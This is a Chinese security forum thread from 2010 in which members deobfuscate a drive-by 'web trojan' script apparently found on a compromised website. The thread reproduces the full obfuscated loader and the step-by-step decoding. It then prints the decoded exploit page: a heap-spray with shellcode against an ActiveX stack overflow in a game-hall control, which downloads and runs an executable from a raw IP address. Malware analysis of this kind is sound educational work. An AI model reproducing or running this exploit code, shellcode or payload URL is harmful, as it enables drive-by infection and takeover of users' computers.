小小的例子，小小的网马(编辑完成) by 是昔流芳[LSG]

是昔流芳 · 发表于 2010-3-14 17:51

这是我从知道创宇上看到的力帆网上挂的一个马。前些日子看冬奥会有个古典式和一个什么式滑雪，反正是一个现代的一个古代的，这个例子也和这差不多，挺有趣

[JavaScript] 纯文本查看 复制代码

1

2

3

4

5

6

<script>
var packcode="zC3z84z45zD4zC4zE3zD0zA0zC3z84z54z14z44zE3zD0zA0zC3zD4z54z45z14z02z86z47z47z07zD2z56z17z57z96z67zD3z34zF6zE6z47z56zE6z47zD2z45z97z07z56z02z36zF6zE6z47z56zE6z47zD3z22z47z56z87z47zF2z86z47zD6zC6zB3z02z36z86z16z27z37z56z47zD3z76z26z23z33z13z23z22zE3zD0zA0zC3zF2z84z54z14z44zE3zD0zA0zC3z24zF4z44z95zE3zD0zA0zC3zF4z24zA4z54z34z45z02z96z46zD3z22z47z16z27z76z56z47z22z02z36zC6z16z37z37z96z46zD3z22z36zC6z37z96z46zA3z73z53z13z03z83z24z23z93zD2z23z03z23z64zD2z43z93z33z34zD2z83z63z34z53zD2z13z34z13z83z23z14z43z83z53z34z43z34z22zE3zC3zF2zF4z24zA4z54z34z45zE3zD0zA0zC3z35z34z25z94z05z45z02zC6z16zE6z76z57z16z76z56zD3z22zA4z16z67z16z35z36z27z96z07z47z22zE3z02zD0zA0z67z16z27z02z87z37z87z66z97zC2z87z37z87z66z97z23zB3zD0zA0z67z16z27z02z87z66z97zD3z22z52z57z22zB3zD0zA0z67z16z27z02z36z27z97z16zD3z87z66z97zB2z22z93z03z93z03z22zB2z87z66z97zB3zD0zA0z67z16z27z02z36z27z97z26zD3z22z93z03z93z03z22zB3zD0zA0z67z16z27z02z87z37z87z66z97z16zD3z22z52z57z93z03z93z03z52z57z93z03z93z03z52z57z53z43z56z26z52z57z73z53z83z26z52z57z83z26z33z36z52z57z33z53z73z43z52z57z03z33z73z83z52z57z53z63z66z53z52z57z73z63z83z26z52z57z03z33z23z03z52z57z33z33z66z53z52z57z43z93z36z93z52z57z16z46z43z13z52z57z46z26z33z33z52z57z03z66z33z63z52z57z13z43z26z56z52z57z33z83z23z83z52z57z73z43z66z23z52z57z36z13z22zB3zD0zA0z87z37z87z66z97zD3z22z03z83z52z57z03z46z36z26z52z57z46z16z03z33z52z57z56z26z43z03z52z57z33z26z56z66z52z57z73z53z46z66z52z57z53z56z56z73z52z57z53z56z83z26z52z57z03z33z23z43z52z57z63z63z46z46z52z57z03z36z83z26z52z57z83z26z43z26z52z57z13z36z53z56z52z57z46z46z03z33z52z57z03z43z83z26z52z57z03z33z83z26z52z57z36z33z36z53z52z57z73z23z73z53z52z57z63z46z63z36z52z57z63z56z63z66z52z57z63z43z23z56z52z57z63z36z63z36z52z57z43z33z03z03z52z57z53z36z33z16z52z57z23z56z53z53z52z57z73z83z63z53z52z57z03z03z63z53z52z57z36z03z33z33z52z57z03z33z63z43z52z57z33z03z43z03z52z57z03z36z73z83z52z57z43z03z83z26z52z57z83z26z03z36z52z57z13z36z73z03z52z57z83z26z16z46z52z57z03z83z43z03z52z57z03z93z56z26z52z57z43z03z83z26z52z57z83z46z33z43z52z57z73z36z43z03z52z57z43z03z83z26z52z57z93z53z33z36z52z57z83z56z26z66z52z57z03z56z43z56z52z57z56z83z56z36z52z57z66z66z83z43z52z57z66z66z66z66z52z57z56z36z83z33z52z57z83z33z03z43z52z57z23z43z23z36z52z57z66z66z33z36z52z57z93z53z46z03z52z57z26z66z53z03z52z57z13z16z33z63z52z57z73z03z23z66z52z57z63z66z56z83z52z57z66z66z66z66z52z57z83z26z66z66z52z57z23z43z53z43z52z57z83z46z66z36z52z57z26z16z53z23z52z57z46z26z33z33z52z57z53z33z53z33z22zB3zD0zA0z87z37z87z66z97z23zD3z22z52z57z56z26z53z23z52z57z53z33z23z43z52z57z46z03z66z66z52z57z26z66z53z46z52z57z66z56z93z83z52z57z03z56z83z16z52z57z53z33z56z83z52z57z66z66z66z66z52z57z83z33z66z66z52z57z03z43z56z36z52z57z23z36z83z33z52z57z63z23z23z43z52z57z46z03z66z66z52z57z73z56z26z66z52z57z56z23z46z83z52z57z56z83z73z33z52z57z66z66z43z03z52z57z66z66z66z66z52z57z66z66z53z23z52z57z56z83z46z03z52z57z66z66z46z73z52z57z66z66z66z66z22zB3zD0zA0z67z16z27z02z87z66z97z46z46zF6z37zD3z22z52z57z73z43z63z83z52z57z73z03z73z43z52z57z23z64z33z14z52z57z33z23z23z64z52z57z33z23z33z23z52z57z33z13z23z54z52z57z33z13z33z73z52z57z33z23z23z54z52z57z23z54z33z63z52z57z23z64z33z53z52z57z73z14z73z14z52z57z63z53z23z54z52z57z63z53z73z83z52z57z03z03z03z03z22zB3zD0zA0z67z16z27z02z87z66z97z87z36zF6z46z56zD3z57zE6z56z37z36z16z07z56z82z87z37z87z66z97z16zB2z87z37z87z66z97zB2z87z37z87z66z97z23zB2z87z66z97z46z46zF6z37z92zB3zD0zA0z67z16z27z02z66z97z96z47z56zD6zD3z03z87z43z03z03z03z03zB3zD0zA0z67z16z27z02z87z66z97z87z87z36zF6z46z56z37z02zD3z02z87z66z97z87z36zF6z46z56zB3zD0zA0z67z16z27z02z26z96z76z26zC6zF6z36zB6z02zD3z02z57zE6z56z37z36z16z07z56z82z36z27z97z16zB2z36z27z97z26z92zB3zD0zA0z67z16z27z02z86z56z16z46z56z27z37z96zA7z56z02zD3z02z23z03zB3zD0zA0z67z16z27z02z37zC6z16z36zB6z37z07z16z36z56z02zD3z02z86z56z16z46z56z27z37z96zA7z56zB2z87z66z97z87z87z36zF6z46z56z37zB5z22zC6z56zE6z76z47z86z22zD5zB3zD0zA0z77z86z96zC6z56z02z82z26z96z76z26zC6zF6z36zB6zB5z22zC6z56zE6z76z22zB2z22z47z86z22zD5zC3z37zC6z16z36zB6z37z07z16z36z56z92zD0zA0z26z96z76z26zC6zF6z36zB6zB2zD3z26z96z76z26zC6zF6z36zB6zB3zD0zA0z66z96zC6zC6z26zC6zF6z36zB6z02zD3z02z26z96z76z26zC6zF6z36zB6zB5z22z37z57z26z37z47z22zB2z22z27z96zE6z76z22zD5z82z03zC2z02z37zC6z16z36zB6z37z07z16z36z56z92zB3zD0zA0z26zC6zF6z36zB6z02zD3z02z26z96z76z26zC6zF6z36zB6zB5z22z37z57z22zB2z22z26z37z47z27z22zB2z22z96zE6z76z22zD5z82z03zC2z02z26z96z76z26zC6zF6z36zB6zE2zC6z56zE6z76z47z86zD2z37zC6z16z36zB6z37z07z16z36z56z92zB3zD0zA0z77z86z96zC6z56z82z26zC6zF6z36zB6zB5z22zC6z56z22zB2z22zE6z76z47z86z22zD5zB2z37zC6z16z36zB6z37z07z16z36z56zC3z66z97z96z47z56zD6z92zD0zA0z26zC6zF6z36zB6z02zD3z02z26zC6zF6z36zB6zB2z26zC6zF6z36zB6zB2z66z96zC6zC6z26zC6zF6z36zB6zB3zD0zA0zD6z56zD6zF6z27z97z02zD3z02zE6z56z77z02z77z96zE6z46zF6z77zB5z22z14z27z27z16z97z22zD5z82z92zB3zD0zA0z66zF6z27z02z82z87zD3z03zB3z02z87zC3z33z03z03zB3z02z87zB2zB2z92zD0zA0zD6z56zD6zF6z27z97zB5z87zD5z02zD3z02z26zC6zF6z36zB6z02zB2z02z87z66z97z87z87z36zF6z46z56z37zB3zD0zA0z67z16z27z02z26z57z66z66z56z27z02zD3z02z72z72zB3zD0zA0z77z86z96zC6z56z02z82z26z57z66z66z56z27zB5z22zC6z56zE6z76z47z86z22zD5z02zC3z02z73z93z63z02z92zD0zA0z26z57z66z66z56z27zB2zD3z57zE6z56z37z36z16z07z56z82z22z52z22zB2z22z57z03z22zB2z22z36z03z36z22z92zB3zD0zA0z47z16z27z76z56z47zE2z34z27z56z16z47z56z34z86z96zE6z16z76z16zD6z56z37z82z26z57z66z66z56z27z92zB3zD0zA0zC3zF2z35z34z25z94z05z45zE3zD0zA0zC3zF2z24zF4z44z95zE3zC3zF2z84z45zD4zC4zE3zD0zA0";
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 1(0){4 5.6(0^3)};',7,7,'m|sb|function||return|String|fromCharCode'.split('|'),0,{}))
eval(sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(112)+sb(119)+sb(113)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(33)+sb(33)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(44)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(125)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(60)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(67)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(112)+sb(62)+sb(112)+sb(40)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(112)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(119)+sb(113)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(50)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(49)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(48)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(51)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(43)+sb(44)+sb(121)+sb(44)+sb(100)+sb(47)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(116)+sb(107)+sb(106)+sb(111)+sb(102)+sb(43)+sb(106)+sb(63)+sb(112)+sb(119)+sb(113)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(42)+sb(120)+sb(14)+sb(9)+sb(112)+sb(50)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(118)+sb(97)+sb(112)+sb(119)+sb(113)+sb(43)+sb(106)+sb(47)+sb(49)+sb(42)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(62)+sb(112)+sb(50)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(49)+sb(62)+sb(112)+sb(49)+sb(40)+sb(33)+sb(38)+sb(33)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(50)+sb(94)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(51)+sb(94)+sb(56)+sb(14)+sb(9)+sb(106)+sb(62)+sb(106)+sb(40)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb
(112)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(120)+sb(14)+sb(9)+sb(103)+sb(108)+sb(96)+sb(118)+sb(110)+sb(102)+sb(109)+sb(119)+sb(45)+sb(116)+sb(113)+sb(106)+sb(119)+sb(102)+sb(43)+sb(118)+sb(109)+sb(102)+sb(112)+sb(96)+sb(98)+sb(115)+sb(102)+sb(43)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(42)+sb(42)+sb(56)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(119)+sb(113)+sb(118)+sb(102)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(56)+'');
</script>

Hmily · 发表于 2010-3-15 00:39

数字太长了,导致显示不出来,我设置下面的字体去掉了,这样会少很多代码,可以显示出来了,分几楼发吧.

岁寒三友 · 发表于 2010-3-16 12:40

跟着芳芳学网马解密。
借鉴芳芳的思路进行如下步骤：
看代码就知道为三部分，packcode和两个eval。

先将第一个eval替换成alert，保存为htm，运行后得到：

将

alert(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--)
{d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k
[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 1(0){4 5.6
(0^3)};',7,7,'m|sb|function||return|String|fromCharCode'.split('|'),0,{}))

替换为

function sb(m){return String.fromCharCode(m^3)};

保存为htm且运行得到解密函数：

将此解密函数替换掉原来代码中的两个eval部分，并将document.write换成alert，保存为htm且运行得到：

只需解密这部分

%u7468%u7074%u2F3A%u322F%u3232%u312E%u3137%u322E%u2E36%u2F35%u7A7A%u652E%u6578%u0000

FreShow中两次esc就可解出网马地址为

是昔流芳 · 发表于 2010-3-14 17:55

这段代码放到神器里可以直接跑出结果，不过这样做的话就没意思了

中间有段eval（貌似这类东西正规点的说法叫base62...），把eval替换成alert，搞定他，出来这堆东西

function sb(m){return String.fromCharCode(m^3)};

这里需要解释一下String.fromCharCode是干什么的了，它的主要作用是把ASCII码转换为字符。后面的m^3的意思是对括号内的数字进行xor运算，参数是3.这样我们来试一试。
打开windows的计算器，使用科学型，输入101（这是sb里的第一个），点击XOR，然后敲3，就可以出来结果 102 ，然后依次是 117 110 99 116 ......
然后对照ASCII码表，可以知道这些数字表示的是funct 如果我们把sb里的数字一个个算出来，那么就可以得到这段含sb的代码的内容，有兴趣的话可以一点点地算出来，最后会得到解密函数的。

function sb(m){return String.fromCharCode(m^3)};
eval(sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(112)+sb(119)+sb(113)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(33)+sb(33)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(44)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(125)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(60)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(67)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(112)+sb(62)+sb(112)+sb(40)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(112)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(119)+sb(113)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(50)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(49)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(48)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(51)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(43)+sb(44)+sb(121)+sb(44)+sb(100)+sb(47)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(116)+sb(107)+sb(106)+sb(111)+sb(102)+sb(43)+sb(106)+sb(63)+sb(112)+sb(119)+sb(113)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(42)+sb(120)+sb(14)+sb(9)+sb(112)+sb(50)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(118)+sb(97)+sb(112)+sb(119)+sb(113)+sb(43)+sb(106)+sb(47)+sb(49)+sb(42)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(62)+sb(112)+sb(50)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(49)+sb(62)+sb(112)+sb(49)+sb(40)+sb(33)+sb(38)+sb(33)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(50)+sb(94)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(51)+sb(94)+sb(56)+sb(14)+sb(9)+sb(106)+sb(62)+sb(106)+sb(40)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb
(112)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(120)+sb(14)+sb(9)+sb(103)+sb(108)+sb(96)+sb(118)+sb(110)+sb(102)+sb(109)+sb(119)+sb(45)+sb(116)+sb(113)+sb(106)+sb(119)+sb(102)+sb(43)+sb(118)+sb(109)+sb(102)+sb(112)+sb(96)+sb(98)+sb(115)+sb(102)+sb(43)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(42)+sb(42)+sb(56)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(119)+sb(113)+sb(118)+sb(102)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(56)+'');

也可以把两者构造在一起，执行eval解密就可以得到解密函数。

function replacestr(str){

var arr2=new Array();var s="";var i="";

arr2=str.split("");

for(i=0;i<arr2.length;i++){

if(arr2=="/"){arr2=""}

if(arr2=="~"){arr2=""}

if(arr2=="?"){arr2=""}

if(arr2=="@"){arr2=""}

}

for(i=0;i<arr2.length;i++){s=s+arr2}

return s;

}

function unpackcode(code){

var str="";var arr=new Array();var s1="";var s2="";var s3="";var i=0;

str=replacestr(code);

str=str.replace(/z/g,"");

while(i<str.length){

s1=str.substr(i,2);

arr=s1.split("");

s2=s2+"%"+arr[1]+arr[0];

i=i+2;

}

return s2;

}

function main(){

document.write(unescape(unpackcode(packcode)));

return true;

}

main();

好了，既然有了解密函数，那么就把解密函数附加到最后剩下的那段代码后面，执行，就可以得到含有ShellCode的代码了。

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
</HEAD>
<BODY>
<OBJECT id="target" classid="clsid:75108B29-202F-493C-86C5-1C182A485C4C"></OBJECT>
<SCRIPT language="JavaScript">
var xsxfy,xsxfy2;
var xfy="%u";
var crya=xfy+"9090"+xfy;
var cryb="9090";
var xsxfya="%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc1";
xsxfy="08%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353";
xsxfy2="%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff";
var xfyddos="%u7468%u7074%u2F3A%u322F%u3232%u312E%u3137%u322E%u2E36%u2F35%u7A7A%u652E%u6578%u0000";
var xfyxcode=unescape(xsxfya+xsxfy+xsxfy2+xfyddos);
var fyitem=0x40000;
var xfyxxcodes = xfyxcode;
var bigblock = unescape(crya+cryb);
var headersize = 20;
var slackspace = headersize+xfyxxcodes["length"];
while (bigblock["leng"+"th"]<slackspace)
bigblock+=bigblock;
fillblock = bigblock["subst"+"ring"](0, slackspace);
block = bigblock["su"+"bstr"+"ing"](0, bigblock.length-slackspace);
while(block["le"+"ngth"]+slackspace<fyitem)
block = block+block+fillblock;
memory = new window["Array"]();
for (x=0; x<300; x++)
memory[x] = block + xfyxxcodes;
var buffer = '';
while (buffer["length"] < 796 )
buffer+=unescape("%"+"u0"+"c0c");
target.CreateChinagames(buffer);
</SCRIPT>
</BODY></HTML>

最终结果是http://222.171.26.5/zz.exe 是利用的中国游戏中心游戏大厅ActiveX远程栈溢出漏洞（这个游戏大厅我听都没听说过）

最后小结一下：网马的解密离不开Eval Document.Write Execute 这几个基本函数。只要向这几个函数下手，再步步为营，用得到的解密函数进行解密，就会很简单，这应该就是所谓的“替换语句解密”吧^_^

ikinko · 发表于 2010-3-15 02:13

这种是什么加密？

Yewn · 发表于 2010-3-17 08:57

小弟学习拉~~~

tjnhfht · 发表于 2010-3-17 09:51

喜欢技术贴，呵呵

hk_wind · 发表于 2010-3-17 17:34

很喜欢牛

hjwazxp · 发表于 2010-3-19 18:00

此等技术
厉害
我测试下
还报呢
来个图吧

溢出

jiangjunbaifa · 发表于 2010-3-20 08:08

有时间试下哈有时间试下哈有时间试下哈有时间试下哈

帐号		自动登录	找回密码
密码			注册[Register]

